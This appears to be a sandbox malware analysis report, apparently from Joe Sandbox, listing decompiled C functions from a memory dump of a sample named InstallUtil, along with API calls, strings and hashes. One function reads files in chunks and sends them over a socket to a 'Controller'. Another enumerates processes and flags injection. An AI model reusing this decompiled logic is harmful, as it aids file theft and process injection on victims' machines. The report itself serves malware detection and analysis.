Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA

_free.LIBCMT ref: 0044D092
_free.LIBCMT ref: 0044D0A7
_free.LIBCMT ref: 0044D0B2
_free.LIBCMT ref: 0044D0D4
_free.LIBCMT ref: 0044D0E7
_free.LIBCMT ref: 0044D0F5
_free.LIBCMT ref: 0044D100
_free.LIBCMT ref: 0044D138
_free.LIBCMT ref: 0044D13F
_free.LIBCMT ref: 0044D15C
_free.LIBCMT ref: 0044D174

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: db87e76f01b6c0d76bf9a05853fd87c53c52e7524eae72500f86ea9097737d9b
Instruction ID: 56ea24ff2f01d8a93610e14486895ba8636919e893ca4bd9fd263a5f033710de
Opcode Fuzzy Hash: db87e76f01b6c0d76bf9a05853fd87c53c52e7524eae72500f86ea9097737d9b
Instruction Fuzzy Hash: AB315C31A042009FFB20AA7AD985B5773E9EF11714F54842FF548D7252DF79AC408B28

Uniqueness

Uniqueness Score: -1.00%

Function 0040725D Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040725D(void* __ecx, char _a4, char _a8, char _a28, void* _a32, char _a52) {
				char _v12;
				void* _v16;
				char _v28;
				void* _v40;
				char _v52;
				void* _v56;
				char _v64;
				char _v76;
				void* _v80;
				char _v100;
				void* _v104;
				char _v116;
				char _v124;
				char _v128;
				signed int _v140;
				char _v144;
				char _v148;
				struct %anon52 _v156;
				char _v164;
				void* _v168;
				struct %anon52 _v176;
				union _LARGE_INTEGER* _v180;
				void* _v184;
				intOrPtr _v188;
				long _v192;
				signed int _v196;
				intOrPtr _v200;
				union _LARGE_INTEGER* _v204;
				union _LARGE_INTEGER _v208;
				intOrPtr _v216;
				intOrPtr _v220;
				long _v224;
				signed int _v228;
				intOrPtr _v236;
				signed int _v244;
				intOrPtr _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t94;
				void* _t101;
				void* _t111;
				void* _t113;
				void* _t121;
				signed int _t134;
				void* _t135;
				signed int _t136;
				void* _t146;
				void* _t150;
				void* _t161;
				void* _t164;
				signed int _t167;
				struct _OVERLAPPED* _t169;
				struct %anon52 _t192;
				signed int _t208;
				void* _t214;
				union _LARGE_INTEGER* _t247;
				void* _t255;
				void* _t256;
				union _LARGE_INTEGER _t261;
				void* _t262;
				void* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t276;

				_t266 =  &_v184;
				_v140 = _v140 & 0x00000000;
				_t255 = __ecx;
				_v176.LowPart = 0x186a0;
				if(_a4 != 0) {
					_t161 = E00407A23(0x4610ec);
					_t278 = _t161;
					if(_t161 != 0) {
						_t276 =  &_v184 - 0x18;
						E0040773A(_t167, _t276, 0x4610ec, _t278,  &_a8);
						_t164 = E00417C45(_t167,  &_v52, 0x4610ec, _t264);
						_t266 = _t276 + 0x18;
						E00401ED3( &_a28, 0x4610ec, _t256, _t164);
						E00401EC9();
					}
				}
				E00404804(_t255);
				E0040489F(_t255, _t256, _t255);
				_t94 = E00418445(_t167,  &_v124,  &_a28);
				_t267 = _t266 - 0x18;
				_t246 = E00402ED0(_t167,  &_v52, E00402ED0(_t167,  &_v28, E00402ED0(_t167,  &_v100, E00418445(_t167,  &_v76,  &_a4), _t264, _t278, 0x46e260), _t264, _t278,  &_a52), _t264, _t278, 0x46e260);
				E00402E61(_t267, _t99, _t94);
				_push(0xb6);
				_t101 = E00404A78(_t255, _t99, _t278);
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				if((_t167 & 0xffffff00 | _t101 == 0xffffffff) == 0) {
					_t169 = 0;
					_t265 = CreateFileW(E00401EC4( &_v12), 0x80000000, 1, 0, 3, 0x80, 0);
					__eflags = _t265 - 0xffffffff;
					if(__eflags != 0) {
						_v148 = 0;
						_v144 = 0;
						__imp__GetFileSizeEx( &_v148);
						_t247 = _v156.HighPart;
						_t192 = _v156;
						_v176 = _t192;
						_v180 = _t247;
						_v208.LowPart = _t192;
						_v200 = _t247;
						_v196 = 1;
						_v192 = 0;
						_t111 = E00452F70(_t192, _t247, 0x186a0, 0);
						asm("adc edx, ebx");
						_t113 = E0041830B(0,  &_v140, _t247, _t111 + 1, _t247);
						_t268 = _t267 - 0x10;
						E00402E61(_t268, E00402ED0(0,  &_v164, E0041830B(0,  &_v116, _t247, _v192, _v196), _t265, __eflags, 0x46e260), _t113);
						E00404A78(_t255, _t115, __eflags, 0xb7, _t265);
						E00401F98();
						E00401F98();
						E00401F98();
						_t121 = E004183E5( &_v192,  &_v64);
						_t269 = _t268 - 0x18;
						_t251 = "Uploading file to Controller: ";
						E004052D4(0, _t269, "Uploading file to Controller: ", _t265, __eflags, _t121);
						_t270 = _t269 - 0x14;
						E00402053(0, _t270, "Uploading file to Controller: ", _t265, "i");
						E00417D02(0, _t255);
						_t271 = _t270 + 0x30;
						_t208 =  &_v196;
						E00401F98();
						asm("xorps xmm0, xmm0");
						asm("movlpd [esp+0x40], xmm0");
						__eflags = _v228;
						if(__eflags < 0) {
							L22:
							CloseHandle(_t265);
							E00404DFD(_t251);
							_t169 = 1;
							goto L23;
						}
						if(__eflags > 0) {
							L11:
							_t261 = 0;
							__eflags = 0;
							_v204 = _v180;
							_v208.LowPart = _v184;
							_t134 = 0x186a0;
							goto L12;
							do {
								do {
									L12:
									_t246 = _v220;
									__eflags = _t261 - _t246;
									if(__eflags < 0) {
										L16:
										_push(_t134);
										_t135 = E004310E6(_t208, _t246, _t261, __eflags);
										_push(_t169);
										_t262 = _t135;
										_v192 = _t169;
										_v184 = _t262;
										_t136 = SetFilePointerEx(_t265, _v208.LowPart, _v204, _t169);
										__eflags = _t136;
										if(_t136 == 0) {
											_t272 = _t271 - 0x18;
											_t214 = _t271 - 0x18;
											_push("SetFilePointerEx error");
											L27:
											E00402053(_t169, _t214, _t246, _t265);
											E00402053(_t169, _t272 - 0x18, _t246, _t265, "E");
											E00417D02(_t169, _t255);
											E004310EF(_t262);
											CloseHandle(_t265);
											L28:
											E00404DFD(_t246);
											goto L23;
										}
										__eflags = ReadFile(_t265, _t262, _v224,  &_v192, _t169);
										if(__eflags == 0) {
											_t272 = _t271 - 0x18;
											_t214 = _t271 - 0x18;
											_push("ReadFile error");
											goto L27;
										}
										_t146 = E00402077(_t169,  &_v144, _t246, _t265, __eflags, _t262, _v192);
										_t271 = _t271 - 0x18;
										_t253 = E00402ED0(_t169,  &_v176, E0041830B(_t169,  &_v128, _t246, _v224, _v220), _t265, __eflags, 0x46e260);
										E00402E61(_t271, _t148, _t146);
										_push(0x52);
										_t150 = E00404A78(_t255, _t148, __eflags);
										__eflags = _t150 - 0xffffffff;
										E00401F98();
										E00401F98();
										E00401F98();
										__eflags = _t169 & 0xffffff00 | _t150 == 0xffffffff;
										if((_t169 & 0xffffff00 | _t150 == 0xffffffff) != 0) {
											E00404DFD(_t253);
											CloseHandle(_t265);
											E004310EF(_v204);
											goto L5;
										}
										goto L19;
									}
									_t208 = _v228;
									if(__eflags > 0) {
										L15:
										_t134 = _t208;
										_v188 = _t246;
										_v224 = _t134;
										goto L16;
									}
									__eflags = _t134 - _t208;
									if(__eflags <= 0) {
										goto L16;
									}
									goto L15;
									L19:
									E004310EF(_v204);
									_t134 = _v244;
									_v248 = _v248 - _t134;
									_t261 = _v208;
									asm("sbb [esp+0x20], esi");
									_v236 = _v236 + 1;
									_t251 = _v224;
									_t169 = 0;
									asm("adc [esp+0x24], ebx");
									_t208 = _v228 + _t134;
									_v228 = _t208;
									asm("adc edx, esi");
									_v224 = _t251;
									__eflags = _t251 - _v220;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L22;
								}
								__eflags = _t208 - _v216;
							} while (_t208 < _v216);
							goto L22;
						}
						__eflags = _v196;
						if(_v196 <= 0) {
							goto L22;
						}
						goto L11;
					}
					E00402053(0, _t267 - 0x18, _t246, _t265, 0x461084);
					_push(0x53);
					E00404A78(_t255, _t246, __eflags);
					goto L28;
				} else {
					E00404DFD(_t246);
					L5:
					_t169 = 0;
					L23:
					E00401EC9();
					E00401EC9();
					E00401F98();
					return _t169;
				}
			}

0x0040725d
0x00407263
0x00407274
0x00407276
0x0040727e
0x0040728c
0x00407291
0x00407293
0x00407295
0x004072a2
0x004072ae
0x004072b3
0x004072be
0x004072ca
0x004072ca
0x00407293
0x004072d1
0x004072d9
0x004072e9
0x004072ee
0x00407343
0x00407347
0x0040734d
0x00407354
0x00407366
0x00407372
0x0040737b
0x00407387
0x00407390
0x00407397
0x004073a7
0x004073cc
0x004073ce
0x004073d1
0x004073f4
0x004073fa
0x004073fe
0x00407404
0x0040740d
0x00407417
0x0040741c
0x00407420
0x00407424
0x00407428
0x0040742c
0x00407430
0x0040743b
0x0040743f
0x00407444
0x00407475
0x00407482
0x0040748b
0x00407497
0x004074a0
0x004074b0
0x004074b5
0x004074b8
0x004074c0
0x004074c5
0x004074cf
0x004074d4
0x004074d9
0x004074dc
0x004074e0
0x004074e5
0x004074e8
0x004074ee
0x004074f2
0x00407646
0x00407647
0x0040764f
0x00407654
0x00000000
0x00407654
0x004074f8
0x00407504
0x00407508
0x00407508
0x0040750a
0x00407512
0x00407516
0x00407516
0x0040751b
0x0040751b
0x0040751b
0x0040751b
0x0040751f
0x00407521
0x00407537
0x00407537
0x00407538
0x0040753e
0x00407544
0x00407546
0x0040754e
0x00407553
0x00407559
0x0040755b
0x004076b2
0x004076b5
0x004076b7
0x004076bc
0x004076bc
0x004076cb
0x004076d0
0x004076d6
0x004076df
0x004076e5
0x004076e7
0x00000000
0x004076e7
0x00407574
0x00407576
0x004076a6
0x004076a9
0x004076ab
0x00000000
0x004076ab
0x00407585
0x0040758a
0x004075b7
0x004075bb
0x004075c1
0x004075c5
0x004075ca
0x004075d4
0x004075e0
0x004075e9
0x004075ee
0x004075f0
0x0040768b
0x00407691
0x0040769b
0x00000000
0x004076a0
0x00000000
0x004075f0
0x00407523
0x00407527
0x0040752d
0x0040752d
0x0040752f
0x00407533
0x00000000
0x00407533
0x00407529
0x0040752b
0x00000000
0x00000000
0x00000000
0x004075f6
0x004075fa
0x004075ff
0x00407603
0x00407607
0x0040760b
0x0040760f
0x00407614
0x0040761f
0x00407620
0x00407624
0x00407626
0x0040762a
0x0040762c
0x00407630
0x00407630
0x0040763a
0x00000000
0x00000000
0x0040763c
0x0040763c
0x00000000
0x0040751b
0x004074fa
0x004074fe
0x00000000
0x00000000
0x00000000
0x004074fe
0x004073dd
0x004073e2
0x004073e6
0x00000000
0x00407399
0x0040739b
0x004073a0
0x004073a0
0x00407656
0x0040765d
0x00407669
0x00407675
0x00407686
0x00407686

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 004073C6
GetFileSizeEx.KERNEL32(00000000,?), ref: 004073FE
__aulldiv.LIBCMT ref: 00407430

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407553
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040756E
CloseHandle.KERNEL32(00000000), ref: 00407647
CloseHandle.KERNEL32(00000000,00000052), ref: 00407691
CloseHandle.KERNEL32(00000000), ref: 004076DF

Strings

Uploading file to Controller: , xrefs: 004074B8
ReadFile error, xrefs: 004076AB
SetFilePointerEx error, xrefs: 004076B7

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
API String ID: 3086580692-2596673759
Opcode ID: 7daad74c97f216f0ae18c6d5d1713522e760e9c118621a1d33a4109b5a99cdfc
Instruction ID: 367b02927c7d86f21e8ffbef9c58bf59a5b62df31991f00e361bcf90bbefc0a3
Opcode Fuzzy Hash: 7daad74c97f216f0ae18c6d5d1713522e760e9c118621a1d33a4109b5a99cdfc
Instruction Fuzzy Hash: E5B1C2316083409FC314FB25C882AAFB7E5AFC5358F40492FF44A622D1EF7999458B5B

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF95 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040CF95(void* __eflags, char _a4) {
				char _v0;
				void* _v8;
				char _v24;
				short _v524;
				char _v540;
				char _v1060;
				char _v1088;
				void* _v1092;
				char _v1108;
				char _v1112;
				char _v1120;
				void* _v1124;
				void* _v1132;
				char _v1136;
				char _v1164;
				char _v1184;
				char _v1188;
				char _v1192;
				char _v1196;
				void* _v1200;
				char _v1208;
				void* _v1212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t55;
				intOrPtr* _t84;
				void* _t90;
				void* _t94;
				void* _t95;
				void* _t98;
				void* _t103;
				struct _SECURITY_ATTRIBUTES* _t108;
				char* _t113;
				void* _t160;
				void* _t165;
				void* _t166;
				void* _t167;

				_t167 =  &_v1196;
				_t108 = 0;
				GetModuleFileNameW(0,  &_v524, 0x104);
				_t153 = "1";
				if(E00407A23("1") != 0) {
					L14:
					E00401ED3( &_a4, _t153, _t163, E00417E9D(_t108,  &_v1108, _t153));
					_t113 =  &_v1112;
					E00401EC9();
					_t55 = E004186B9(_t113);
					__eflags = _t55;
					if(_t55 != 0) {
						_push(_t113);
						_t161 = L"Program Files\\";
						_t165 = E0040D69B( &_a4, L"Program Files\\");
						__eflags = _t165 - 0xffffffff;
						if(_t165 != 0xffffffff) {
							E0040D6BA(_t108,  &_v0, _t153, _t161, _t166, _t165, E00438416(L"Program Files\\"), L"Program Files (x86)\\");
						}
					}
					_t154 =  &_a4;
					__eflags = E0040ECDF( &_v524,  &_a4);
					if(__eflags != 0) {
						L22:
						E00401EC9();
						return _t108;
					} else {
						L18:
						_t160 = CreateMutexA(_t108, 1, E00401F6B(E00401E25(0x46e600, _t154, _t166, _t171, 7)));
						E0040209F(_t108,  &_v1136);
						E00401EC4(0x46e588);
						E004189A5( &_v1136);
						E00401F6B( &_v1136);
						if(E004150C2(E00401EC4( &_v0)) == 0) {
							CloseHandle(_t160);
						} else {
							_t108 = 1;
							E00410DEB(0x46e5a0, E00401F6B(0x46e5a0), "Inj", 1);
						}
						E00401F98();
						goto L22;
					}
				}
				E00401F46(0,  &_v1196);
				_t166 = CreateToolhelp32Snapshot(2, 0);
				_v1088 = 0x22c;
				_push( &_v1088);
				Process32FirstW(_t166);
				while(Process32NextW(_t166,  &_v1092) != 0) {
					E0040413E(_t108,  &_v1184, _t153, _t166,  &_v1060);
					_t84 = E004022C5( &_v1188,  &_v1164);
					_t163 = E0040228A( &_v1192,  &_v1164);
					E00408448( &_v1164,  *((intOrPtr*)(E004022C5( &_v1196,  &_v1164))),  *_t86,  *_t84);
					_t167 = _t167 + 0xc;
					_t153 =  &_v24;
					_t90 = E0040A060( &_v24);
					__eflags = _t90;
					if(_t90 != 0) {
						E00401ED3( &_v1208, _v1088, _t163, E0041871D( &_v1120, _v1088));
						E00401EC9();
						_t94 = E00407A23( &_v540);
						__eflags = _t94;
						if(_t94 == 0) {
							_t153 = 0x4610ec;
							_t95 = E00407A23(0x4610ec);
							__eflags = _t95;
							if(_t95 != 0) {
								L12:
								E00401EC9();
								L13:
								E00401EC9();
								goto L14;
							}
							_t98 = E004186E7(_v1088);
							__eflags = _t98;
							if(_t98 != 0) {
								goto L12;
							}
							E0040A00F( &_v1208);
							E00401EC9();
							break;
						}
						E00401EC9();
						E00401EC9();
						goto L22;
					}
					E00401EC9();
				}
				CloseHandle(_t166);
				_t153 = 0x4610ec;
				_t103 = E00407A23(0x4610ec);
				_t171 = _t103;
				if(_t103 != 0) {
					goto L13;
				}
				E00401EC9();
				goto L18;
			}

0x0040cf95
0x0040cfac
0x0040cfaf
0x0040cfb5
0x0040cfc8
0x0040d14f
0x0040d160
0x0040d165
0x0040d169
0x0040d16e
0x0040d173
0x0040d175
0x0040d177
0x0040d178
0x0040d18a
0x0040d18c
0x0040d18f
0x0040d1a6
0x0040d1a6
0x0040d18f
0x0040d1ab
0x0040d1be
0x0040d1c0
0x0040d255
0x0040d25c
0x0040d26d
0x0040d1c6
0x0040d1c6
0x0040d1e7
0x0040d1e9
0x0040d1f3
0x0040d1fe
0x0040d207
0x0040d225
0x0040d246
0x0040d227
0x0040d22e
0x0040d23c
0x0040d242
0x0040d250
0x00000000
0x0040d250
0x0040d1c0
0x0040cfd2
0x0040cfe0
0x0040cfe2
0x0040cff4
0x0040cff6
0x0040d06c
0x0040d00a
0x0040d018
0x0040d02d
0x0040d047
0x0040d04c
0x0040d04f
0x0040d05a
0x0040d05f
0x0040d061
0x0040d0c3
0x0040d0cc
0x0040d0dc
0x0040d0e1
0x0040d0e3
0x0040d0fc
0x0040d105
0x0040d10a
0x0040d10c
0x0040d13d
0x0040d141
0x0040d14a
0x0040d14a
0x00000000
0x0040d14a
0x0040d115
0x0040d11a
0x0040d11c
0x00000000
0x00000000
0x0040d12a
0x0040d133
0x00000000
0x0040d133
0x0040d0e9
0x0040d0f2
0x00000000
0x0040d0f2
0x0040d067
0x0040d067
0x0040d084
0x0040d08a
0x0040d093
0x0040d09c
0x0040d09e
0x00000000
0x00000000
0x0040d0a4
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046E600,00000000,?,00000001), ref: 0040CFAF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CFDA
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040CFF6
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D075
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040D084
_wcslen.LIBCMT ref: 0040D197
CreateMutexA.KERNEL32(00000000,00000001,00000000,00000007,00000000,?,00000001), ref: 0040D1DD
CloseHandle.KERNEL32(00000000,?,00000001), ref: 0040D246

Part of subcall function 0041871D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00418732

Strings

Inj, xrefs: 0040D230
Program Files\, xrefs: 0040D178, 0040D184, 0040D196
Program Files (x86)\, xrefs: 0040D191

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32_wcslen
String ID: Inj$Program Files (x86)\$Program Files\
API String ID: 2701142382-2211889894
Opcode ID: 4fc4cf5d6ef372622b163ed33b4117bfbf0ddf7ea9fafd9375a68d2d06735402
Instruction ID: 5500f8629f1523b62fbb441cdd828a3a8cd3e0a01c70736722aead03e22f43ed
Opcode Fuzzy Hash: 4fc4cf5d6ef372622b163ed33b4117bfbf0ddf7ea9fafd9375a68d2d06735402
Instruction Fuzzy Hash: 686184711083418BC614FB61C895EAF73A8AF9034CF40093EB586631E2EF78994ECA5B

Uniqueness

Uniqueness Score: -1.00%

Function 0044C371 Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0044C371(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E00441BB3(0, 1, 0x50);
					_v8 = _t234;
					E004427C2(0);
					if(_t234 != 0) {
						_t227 = E00441BB3(0, 1, 4);
						_v12 = _t227;
						E004427C2(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x46c178, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E00441BB3(0, 1, 4);
							_v16 = _t232;
							E004427C2(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E0044EBE5(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E0044EBE5(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E0044EBE5(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E0044EBE5(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E0044EBE5(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E0044EBE5(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E0044EBE5(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E0044EBE5(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E0044EBE5(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E0044EBE5(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E0044EBE5(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E0044EBE5(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E0044EBE5(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E0044EBE5(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E0044EBE5(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E0044EBE5(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E0044EBE5(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E0044EBE5(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E0044EBE5(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E0044EBE5(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E0044EBE5(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E0044C273(_v8);
								E004427C2(_v8);
								E004427C2(_v12);
								E004427C2(_v16);
								goto L4;
							}
							E004427C2(_t234);
							E004427C2(_v12);
							L7:
							goto L4;
						}
						E004427C2(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x46c178;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E004427C2( *(_t210 + 0x88));
							E004427C2( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}

0x0044c371
0x0044c37a
0x0044c381
0x0044c384
0x0044c387
0x0044c390
0x0044c3b2
0x0044c3b6
0x0044c3b9
0x0044c3c3
0x0044c3d6
0x0044c3da
0x0044c3dd
0x0044c3e7
0x0044c3f9
0x0044c68f
0x0044c690
0x0044c692
0x0044c69a
0x0044c69e
0x0044c6a3
0x0044c6ae
0x0044c6ba
0x0044c6c6
0x0044c6d2
0x0044c6d8
0x0044c6dc
0x0044c6de
0x0044c6de
0x00000000
0x0044c6dc
0x0044c408
0x0044c40c
0x0044c40f
0x0044c419
0x0044c42d
0x0044c433
0x0044c448
0x0044c45c
0x0044c473
0x0044c48d
0x0044c495
0x0044c4a7
0x0044c4be
0x0044c4d5
0x0044c4ef
0x0044c506
0x0044c51d
0x0044c534
0x0044c54e
0x0044c565
0x0044c57c
0x0044c593
0x0044c5ad
0x0044c5c4
0x0044c5db
0x0044c5f2
0x0044c60c
0x0044c628
0x0044c656
0x0044c669
0x0044c65a
0x0044c65e
0x0044c672
0x00000000
0x00000000
0x0044c674
0x0044c676
0x0044c679
0x0044c67b
0x0044c67e
0x0044c664
0x0044c666
0x0044c668
0x0044c668
0x0044c668
0x0044c65e
0x00000000
0x0044c66e
0x0044c62e
0x0044c634
0x0044c63d
0x0044c646
0x00000000
0x0044c64b
0x0044c41c
0x0044c425
0x0044c3ef
0x00000000
0x0044c3ef
0x0044c3ea
0x00000000
0x0044c3ea
0x0044c3c5
0x00000000
0x0044c39a
0x0044c39a
0x0044c39c
0x0044c39f
0x0044c6e0
0x0044c6e0
0x0044c6e8
0x0044c6ea
0x0044c6ea
0x0044c6f2
0x0044c6f7
0x0044c6fb
0x0044c703
0x0044c70b
0x0044c711
0x0044c6fb
0x0044c715
0x0044c71a
0x0044c720
0x00000000
0x0044c720

APIs

_free.LIBCMT ref: 0044C3B9
_free.LIBCMT ref: 0044C3DD
_free.LIBCMT ref: 0044C3EA
_free.LIBCMT ref: 0044C40F
_free.LIBCMT ref: 0044C41C
_free.LIBCMT ref: 0044C425
_free.LIBCMT ref: 0044C703
_free.LIBCMT ref: 0044C70B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bf17aadf7d0b1454e51f6f2e82ae52b9e5c7dada269d22980b5cbc534f11bae7
Instruction ID: 2aaa2d3f0cfef8b1f8f058454d09b4c7c5dd551ea9896ea5cb60de1f9d18f11e
Opcode Fuzzy Hash: bf17aadf7d0b1454e51f6f2e82ae52b9e5c7dada269d22980b5cbc534f11bae7
Instruction Fuzzy Hash: ADC16972E41204AFFB60DBA9CC82FEE77F8EB08704F144556FA05FB282D574A9418764

Uniqueness

Uniqueness Score: -1.00%

Function 0045194C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E0045194C(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
